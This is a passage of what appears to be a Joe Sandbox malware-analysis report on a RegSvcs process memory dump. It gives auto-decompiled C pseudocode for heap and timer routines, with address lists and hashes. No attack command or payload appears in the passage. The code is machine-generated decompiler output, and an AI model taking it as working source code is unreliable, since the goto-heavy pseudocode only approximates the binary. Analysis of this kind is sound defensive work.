									E01071582(0x230, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t213 & 0x000000ff);
								}
								_t129 = E00FD7D50();
								__eflags = _t129;
								if(_t129 != 0) {
									_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								} else {
									_t132 = 0x7ffe0388;
								}
								__eflags =  *_t132;
								if( *_t132 != 0) {
									E0106FEC0(0x230, _t218, _v12, _v8);
								}
								__eflags =  *(_t218 + 0x4c);
								_t214 =  *(_v12 + 0x24);
								if( *(_t218 + 0x4c) != 0) {
									_t197 =  *(_t218 + 0x50) ^  *_t214;
									 *_t214 = _t197;
									_t175 = _t197 >> 0x00000010 ^ _t197 >> 0x00000008 ^ _t197;
									__eflags = _t197 >> 0x18 - _t175;
									if(__eflags != 0) {
										_push(_t175);
										E0106FA2B(0x230, _t218, _t214, _t214, _t218, __eflags);
									}
								}
								_t157 =  *(_v12 + 0x24);
								goto L3;
							}
						}
					}
				} else {
					_v16 = _v16 >> 3;
					_t157 = E00FD99BF(__ecx, _t87,  &_v16, 0);
					E00FDA830(__ecx, _t157, _v16);
					if( *(_t218 + 0x4c) != 0) {
						_t206 =  *(_t218 + 0x50) ^  *_t157;
						 *_t157 = _t206;
						_t185 = _t206 >> 0x00000010 ^ _t206 >> 0x00000008 ^ _t206;
						if(_t206 >> 0x18 != _t185) {
							_push(_t185);
							E0106FA2B(_t157, _t218, _t157, 0, _t218, __eflags);
						}
					}
					L3:
					return _t157;
				}
			}

0x00fdb23f
0x00fdb246
0x00fdb249
0x00fdb24b
0x00fdb251
0x00fdb258
0x00fdb262
0x00fdb2b2
0x00fdb2b6
0x00fdb456
0x00fdb456
0x00fdb45a
0x01022912
0x01022914
0x01022916
0x00000000
0x00000000
0x0102291f
0x01022921
0x00000000
0x00000000
0x01022927
0x00000000
0x01022927
0x00fdb460
0x00fdb460
0x00fdb462
0x00fdb464
0x0102292e
0x01022931
0x0102293f
0x01022945
0x01022945
0x01022931
0x00000000
0x00fdb464
0x00fdb2bc
0x00fdb2bf
0x00fdb2c5
0x00fdb2c8
0x00fdb2ca
0x010227af
0x010227af
0x00fdb2d0
0x00fdb2d7
0x00fdb437
0x00fdb2dd
0x00fdb2dd
0x00fdb2dd
0x00fdb2e3
0x00fdb2e5
0x00fdb43e
0x00fdb443
0x010227b6
0x010227b6
0x00fdb443
0x00fdb2f5
0x00fdb2fa
0x00fdb2fd
0x00fdb2ff
0x00fdb46f
0x00fdb46f
0x00fdb30a
0x00fdb30f
0x00fdb310
0x00fdb315
0x00fdb31b
0x00fdb31c
0x00fdb321
0x00fdb322
0x00fdb329
0x00fdb32b
0x00fdb32d
0x010227c2
0x010227c2
0x010227c5
0x010227c7
0x00000000
0x00000000
0x010227c9
0x010227cb
0x010227ce
0x010227d0
0x010227d2
0x010227d2
0x010227d5
0x010227db
0x010227e0
0x010227e1
0x010227e6
0x010227e7
0x010227ee
0x010227f0
0x010227f2
0x00000000
0x010227f4
0x010227f4
0x00000000
0x010227f4
0x010227f2
0x010227f7
0x010227f9
0x00000000
0x00000000
0x010227ff
0x00000000
0x00fdb333
0x00fdb333
0x00fdb336
0x00fdb336
0x00fdb33c
0x00fdb341
0x00fdb344
0x00fdb44e
0x00fdb44e
0x00fdb34a
0x00fdb34d
0x00fdb353
0x00fdb358
0x00fdb359
0x00fdb35e
0x00fdb35f
0x00fdb366
0x00fdb368
0x00fdb36a
0x010228f2
0x010228fe
0x01022903
0x01022903
0x00000000
0x00fdb370
0x00fdb38c
0x00fdb391
0x00fdb393
0x0102280a
0x0102280a
0x00fdb399
0x00fdb39b
0x00000000
0x00fdb3a1
0x00fdb3a1
0x00fdb3a6
0x00fdb3b0
0x00fdb3b2
0x0102281d
0x00fdb3b8
0x00fdb3b8
0x00fdb3b8
0x00fdb3ba
0x00fdb3bd
0x01022824
0x0102282a
0x01022831
0x01022841
0x0102284b
0x0102284d
0x01022858
0x01022858
0x01022858
0x01022870
0x01022870
0x01022831
0x00fdb3c3
0x00fdb3c8
0x00fdb3d2
0x00fdb3d4
0x01022883
0x00fdb3da
0x00fdb3da
0x00fdb3da
0x00fdb3dc
0x00fdb3df
0x0102288f
0x01022891
0x0102289c
0x0102289c
0x0102289c
0x010228b4
0x010228b4
0x00fdb3e5
0x00fdb3ea
0x00fdb3ec
0x010228c7
0x00fdb3f2
0x00fdb3f2
0x00fdb3f2
0x00fdb3f7
0x00fdb3fa
0x010228d9
0x010228d9
0x00fdb400
0x00fdb407
0x00fdb40a
0x00fdb40f
0x00fdb413
0x00fdb41f
0x00fdb424
0x00fdb426
0x010228e3
0x010228e8
0x010228e8
0x00fdb426
0x00fdb42f
0x00000000
0x00fdb42f
0x00fdb39b
0x00fdb36a
0x00fdb264
0x00fdb264
0x00fdb279
0x00fdb27f
0x00fdb287
0x00fdb28c
0x00fdb290
0x00fdb29c
0x00fdb2a3
0x010227a0
0x010227a5
0x010227a5
0x00fdb2a3
0x00fdb2a9
0x00fdb2b1
0x00fdb2b1

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
Instruction ID: 11b0e00af6abf028621be673ea14b41ad76549fa5e7e6a5763484be3026cb4b0
Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
Instruction Fuzzy Hash: C2B1C132B04615DFDB15DFA9C890BBEBBE6AF44300F29416AE591DB382D774D900EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC849B Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00FC849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x108f9c0);
				E0100D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x10a7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E00FCCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E00FD2280( *[fs:0x30], 0x10a8550);
						_t139 =  *0x10a7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E00FEF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E00FCFFB0(_t193, _t235, 0x10a8550);
								L5:
								return E0100D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E00FB1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x10a7b9c; // 0x0
							_t235 = L00FD4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x10a7b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E00FEA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E00FCFFB0(_t193, _t235, 0x10a8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L00FD77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L00FD77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x10a7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x10a7b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E00FF37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x10a7b9c; // 0x0
									_t214 = L00FD4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E00FF37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x10a7b10 =  *0x10a7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x10a7b04 =  *0x10a7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L00FD77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L00FD77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x10a7b08 =  *0x10a7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E00FF57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E00FFF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L00FD77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E00FEA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L00FD77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E00FF96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x00fc849b
0x00fc849b
0x00fc849b
0x00fc849b
0x00fc849d
0x00fc84a2
0x00fc84a7
0x00fc84b1
0x00fc84d8
0x00000000
0x00fc84b3
0x00fc84c4
0x00fc84c9
0x00fc84cd
0x00fc84cf
0x00fc84cf
0x00fc84d6
0x00fc84e6
0x00fc84e9
0x00fc84ec
0x00fc84ef
0x00fc84f2
0x00fc84f4
0x00fc84fc
0x00fc8501
0x00fc8506
0x00fc8509
0x00fc86e0
0x00fc86e5
0x00fc86e8
0x00fc86ed
0x00fc86f0
0x00fc86f2
0x01019afd
0x01019b02
0x00fc84da
0x00fc84df
0x00fc84df
0x00fc86fa
0x00fc86fd
0x00fc86fe
0x00fc8701
0x00fc8706
0x00fc8709
0x00fc870b
0x00000000
0x00000000
0x00fc8711
0x00fc8725
0x00fc8727
0x00fc872a
0x00fc872c
0x01019af0
0x01019af5
0x00fc8732
0x00fc8732
0x00fc8732
0x00fc8735
0x00fc8737
0x00fc8515
0x00fc8515
0x00fc8518
0x00fc851d
0x00fc8523
0x00fc8527
0x00fc852b
0x00fc8537
0x00fc8539
0x00fc853c
0x00fc853e
0x00fc868c
0x00fc8691
0x00fc8699
0x00fc869b
0x00fc8744
0x00fc8748
0x00fc86a1
0x00fc86a1
0x00fc86a1
0x00fc86a4
0x00fc86a8
0x01019bdf
0x01019bdf
0x00fc86ae
0x00fc86b0
0x00000000
0x00fc86b6
0x00000000
0x01019be9
0x00fc86b0
0x00fc8544
0x00fc854a
0x00fc854d
0x00fc8551
0x00fc876e
0x00fc8778
0x00fc877b
0x00fc8780
0x00fc8557
0x00fc8557
0x00fc855d
0x00fc855d
0x00fc856b
0x00fc856e
0x00fc8570
0x00fc8573
0x00fc8576
0x00fc8576
0x00fc8579
0x00fc857b
0x00000000
0x00000000
0x00fc8581
0x00fc85a0
0x00fc85a2
0x00fc85a5
0x00fc85a7
0x01019b1b
0x01019b1b
0x00fc862e
0x00fc862e
0x00fc8631
0x00fc8631
0x00fc8634
0x00fc8636
0x00fc8669
0x00fc8669
0x00fc866b
0x01019bbf
0x01019bc4
0x01019bc8
0x01019bce
0x01019bce
0x00fc8671
0x00fc8671
0x00fc8674
0x00fc8676
0x01019bae
0x01019bae
0x00fc8676
0x00fc867c
0x00fc867e
0x00fc8688
0x00fc8688
0x00000000
0x00fc867e
0x00fc8638
0x00fc8638
0x00fc863b
0x00fc863e
0x00fc863f
0x00fc8642
0x00fc8645
0x00fc8648
0x00fc864d
0x01019b69
0x01019b6e
0x01019b7b
0x01019b81
0x01019b85
0x01019b89
0x01019ba7
0x01019b8b
0x01019b91
0x01019b9a
0x01019b9f
0x01019b9f
0x00fc8788
0x00fc878d
0x00fc8763
0x00fc8763
0x00fc8766
0x00000000
0x00fc8766
0x01019b70
0x00000000
0x01019b70
0x00fc8656
0x00fc865a
0x00fc865c
0x00fc8752
0x00fc8756
0x00000000
0x00000000
0x00fc875e
0x00000000
0x00fc875e
0x00fc8662
0x00fc8662
0x00fc8662
0x00fc8666
0x00000000
0x00fc8666
0x00fc85b7
0x00fc85b9
0x00fc85bc
0x00fc85bf
0x00fc85cc
0x00fc85d1
0x00fc85d4
0x00fc85db
0x00fc85de
0x00fc85e0
0x01019b5f
0x00000000
0x01019b5f
0x00fc85e6
0x00fc85ea
0x00fc86c3
0x00fc86c5
0x00fc86c8
0x00fc86ca
0x01019b16
0x00000000
0x01019b16
0x00fc86d6
0x00fc85f6
0x00fc85f6
0x00fc85f9
0x00fc8602
0x00fc8606
0x00fc860a
0x00fc860b
0x00fc860e
0x00fc8611
0x00000000
0x00fc8611
0x00fc85f3
0x00000000
0x00fc85f3
0x00fc8619
0x00fc861e
0x00fc861e
0x00fc8621
0x00fc8622
0x00fc8623
0x00fc8625
0x00fc862c
0x00000000
0x00fc873d
0x00000000
0x00fc873d
0x00fc8737
0x00fc850f
0x00fc8512
0x00000000
0x00fc8512
0x00000000
0x00fc84d6

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ac6dc850546ab6b1774f8143a4728f0984b7bf40189acc84f9b5c76694d3cb
Instruction ID: 3c52853e2d62f3aee87b0b11e4e2b18170a1170ec015b1d420c8d0444f6fceca
Opcode Fuzzy Hash: e0ac6dc850546ab6b1774f8143a4728f0984b7bf40189acc84f9b5c76694d3cb
Instruction Fuzzy Hash: 29B16BB1E0020ADFDB14DFA8CA91FADBBB5BF44344F14412EE505AB245DB75AC46EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00FE6A60 Relevance: .2, Instructions: 227
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00FE6A60(intOrPtr* _a4) {
				signed int _v8;
				char _v24;
				signed char _v25;
				intOrPtr* _v32;
				signed char _v36;
				signed int _v40;
				intOrPtr* _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr* _v68;
				signed char _v72;
				signed char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed char _v88;
				signed int _v92;
				signed char _v96;
				char _v100;
				signed int _v104;
				void* _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t101;
				void* _t105;
				signed int _t112;
				signed int* _t113;
				signed int* _t114;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t122;
				signed int _t127;
				intOrPtr* _t128;
				signed int _t131;
				signed char _t134;
				signed int _t136;
				intOrPtr* _t138;
				intOrPtr* _t139;
				intOrPtr _t143;
				signed char _t144;
				signed short _t145;
				signed char _t146;
				intOrPtr* _t147;
				intOrPtr _t148;
				void* _t150;
				char _t152;
				signed int _t153;
				signed char _t154;

				_v8 =  *0x10ad360 ^ _t153;
				_t144 =  *0x7ffe03c6;
				_v25 = _t144;
				_t128 = _a4;
				_v44 = _t128;
				if((_t144 & 0x00000001) == 0) {
					L54:
					_push(0);
					_push( &_v100);
					E00FF9810();
					 *_t128 = _v100;
					 *(_t128 + 4) = _v96;
					goto L20;
				} else {
					do {
						_t148 =  *0x7ffe03b8;
						_t134 =  *0x7FFE03BC;
						_t146 =  *0x7FFE03BC;
						_v60 = _t148;
						_v76 = _t134;
					} while (_t148 !=  *0x7ffe03b8 || _t134 != _t146);
					_t128 = _v44;
					if((_t144 & 0x00000002) != 0) {
						_t147 =  *0x10a6908; // 0x0
						_v68 = _t147;
						if(_t147 == 0) {
							goto L54;
						} else {
							goto L22;
						}
						while(1) {
							L22:
							_t101 =  *_t147;
							_v32 = _t101;
							if(_t101 == 0) {
								break;
							}
							if(_t144 >= 0) {
								if((_t144 & 0x00000020) == 0) {
									if((_t144 & 0x00000010) != 0) {
										asm("mfence");
									}
								} else {
									asm("lfence");
								}
								asm("rdtsc");
							} else {
								asm("rdtscp");
								_v72 = _t134;
							}
							_v52 = _t101;
							_v84 =  *((intOrPtr*)(_t147 + 8));
							_v64 =  *((intOrPtr*)(_t147 + 0x10));
							_v80 =  *((intOrPtr*)(_t147 + 0x14));
							_t105 = E00FFCF90(_t144, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t146 = _t144;
							E00FFCF90(_v52, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t150 = _t105 + _t144;
							_t144 = _v25;
							asm("adc edi, 0x0");
							_v40 = _t150 + _v64;
							_t147 = _v68;
							asm("adc edi, [ebp-0x4c]");
							_v36 = _t146;
							if( *_t147 != _v32) {
								continue;
							} else {
								_t128 = _v44;
								_t147 = _v60;
								L19:
								_t144 = _v36;
								asm("adc edx, [ebp-0x48]");
								 *_t128 = E00FFD340(_v40 + _t147,  *0x7ffe03c7 & 0x000000ff, _t144);
								 *(_t128 + 4) = _t144;
								L20:
								return E00FFB640(1, _t128, _v8 ^ _t153, _t144, _t146, _t147);
							}
						}
						_t128 = _v44;
						goto L54;
					}
					_v56 = 0xffffffff;
					if( *((intOrPtr*)( *[fs:0x18] + 0xfdc)) == 0) {
						_t136 = 0x14c;
						L14:
						_t112 = _t136 & 0x0000ffff;
						L15:
						if(_t112 == 0xaa64) {
							_t113 =  &_v40;
							_v32 = _t113;
							_t138 = _v32;
							asm("int 0x81");
							 *_t138 = _t113;
							 *(_t138 + 4) = _t144;
							if((_t144 & 0x00000040) == 0) {
								goto L19;
							}
							_t114 =  &_v92;
							_v32 = _t114;
							_t139 = _v32;
							asm("int 0x81");
							 *_t139 = _t114;
							 *(_t139 + 4) = _t144;
							_t144 = _v88;
							if(((_t144 ^ _v36) & 0x00000001) != 0) {
								goto L19;
							}
							_t112 = _v92;
							L18:
							_v40 = _t112;
							_v36 = _t144;
							goto L19;
						}
						if(_t144 >= 0) {
							if((_t144 & 0x00000020) == 0) {
								if((_t144 & 0x00000010) != 0) {
									asm("mfence");
								}
							} else {
								asm("lfence");
							}
							asm("rdtsc");
						} else {
							asm("rdtscp");
						}
						goto L18;
					}
					_t117 =  *[fs:0x18];
					_t143 =  *((intOrPtr*)(_t117 + 0xfdc));
					if(_t143 < 0) {
						_t117 = _t117 + _t143;
					}
					if(_t117 ==  *((intOrPtr*)(_t117 + 0x18))) {
						_t118 =  *((intOrPtr*)(_t117 + 0xe38));
					} else {
						_t118 =  *((intOrPtr*)(_t117 + 0x14d0));
					}
					if(_t118 == 0 ||  *((short*)(_t118 + 0x22)) == 0) {
						L34:
						_v48 = 0x10;
						_push( &_v48);
						_push(0x10);
						_t146 =  &_v24;
						_push(_t146);
						_push(4);
						_push( &_v56);
						_push(0xb5);
						_t122 = E00FFAA90();
						if(_t122 == 0xc0000023) {
							_t152 = _v48;
							E00FFD000(_t152);
							_t146 = _t154;
							_push( &_v48);
							_push(_t152);
							_push(_t146);
							_push(4);
							_push( &_v56);
							_push(0xb5);
							_t122 = E00FFAA90();
							_t147 = _v60;
						}
						if(_t122 < 0) {
							_t112 = _v104;
							_t144 = _v25;
							goto L15;
						} else {
							_t145 =  *_t146;
							_t136 = 0;
							if(_t145 == 0) {
								L43:
								_t144 = _v25;
								goto L14;
							}
							_t131 = 0;
							do {
								if((_t145 & 0x00040000) != 0) {
									_t136 = _t145 & 0x0000ffff;
								}
								_t145 =  *(_t146 + 4 + _t131 * 4);
								_t131 = _t131 + 1;
							} while (_t145 != 0);
							_t128 = _v44;
							goto L43;
						}
					} else {
						_t127 =  *(_t118 + 0x20) & 0x0000ffff;
						if(_t127 == 0) {
							goto L34;
						}
						_t136 = _t127;
						goto L14;
					}
				}
			}

0x00fe6a6f
0x00fe6a72
0x00fe6a78
0x00fe6a7c
0x00fe6a7f
0x00fe6a87
0x01028049
0x01028049
0x0102804e
0x0102804f
0x01028057
0x0102805c
0x00000000
0x00fe6a8d
0x00fe6a92
0x00fe6a92
0x00fe6a94
0x00fe6a99
0x00fe6a9c
0x00fe6a9f
0x00fe6aa2
0x00fe6aaa
0x00fe6ab0
0x01027eae
0x01027eb4
0x01027eb9
0x00000000
0x00000000
0x00000000
0x00000000
0x01027ebf
0x01027ebf
0x01027ebf
0x01027ec1
0x01027ec6
0x00000000
0x00000000
0x01027ece
0x01027edb
0x01027ee5
0x01027ee7
0x01027ee7
0x01027edd
0x01027edd
0x01027edd
0x01027eea
0x01027ed0
0x01027ed0
0x01027ed3
0x01027ed3
0x01027eec
0x01027ef8
0x01027f00
0x01027f07
0x01027f0a
0x01027f19
0x01027f1b
0x01027f23
0x01027f25
0x01027f28
0x01027f2e
0x01027f31
0x01027f34
0x01027f37
0x01027f3c
0x00000000
0x01027f3e
0x01027f3e
0x01027f41
0x00fe6b35
0x00fe6b38
0x00fe6b44
0x00fe6b4c
0x00fe6b4e
0x00fe6b51
0x00fe6b69
0x00fe6b69
0x01027f3c
0x01028046
0x00000000
0x01028046
0x00fe6abc
0x00fe6aca
0x01027f49
0x00fe6b13
0x00fe6b13
0x00fe6b16
0x00fe6b1e
0x01027fe7
0x01027fea
0x01027fed
0x01027ff0
0x01027ff2
0x01027ff4
0x01027ffa
0x00000000
0x00000000
0x01028000
0x01028003
0x01028006
0x01028009
0x0102800b
0x0102800d
0x01028010
0x0102801f
0x00000000
0x00000000
0x01028025
0x00fe6b2f
0x00fe6b2f
0x00fe6b32
0x00000000
0x00fe6b32
0x00fe6b26
0x01028030
0x0102803a
0x0102803c
0x0102803c
0x01028032
0x01028032
0x01028032
0x0102803f
0x00fe6b2c
0x00fe6b2c
0x00fe6b2c
0x00000000
0x00fe6b26
0x00fe6ad0
0x00fe6ad6
0x00fe6ade
0x00fe6ae0
0x00fe6ae0
0x00fe6ae5
0x01027f53
0x00fe6aeb
0x00fe6aeb
0x00fe6aeb
0x00fe6af3
0x01027f5e
0x01027f61
0x01027f68
0x01027f69
0x01027f6b
0x01027f70
0x01027f71
0x01027f76
0x01027f77
0x01027f7c
0x01027f86
0x01027f88
0x01027f8d
0x01027f92
0x01027f97
0x01027f98
0x01027f99
0x01027f9a
0x01027f9f
0x01027fa0
0x01027fa5
0x01027faa
0x01027faa
0x01027faf
0x01027fdc
0x01027fdf
0x00000000
0x01027fb1
0x01027fb1
0x01027fb3
0x01027fb8
0x01027fd4
0x01027fd4
0x00000000
0x01027fd4
0x01027fba
0x01027fbc
0x01027fc2
0x01027fc4
0x01027fc4
0x01027fc7
0x01027fcb
0x01027fcc
0x01027fd1
0x00000000
0x01027fd1
0x00fe6b04
0x00fe6b04
0x00fe6b0b
0x00000000
0x00000000
0x00fe6b11
0x00000000
0x00fe6b11
0x00fe6af3

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acde7c066c1e1a23995d32654b2739021589cf10968fa1b65c3ef96ae32faa5e
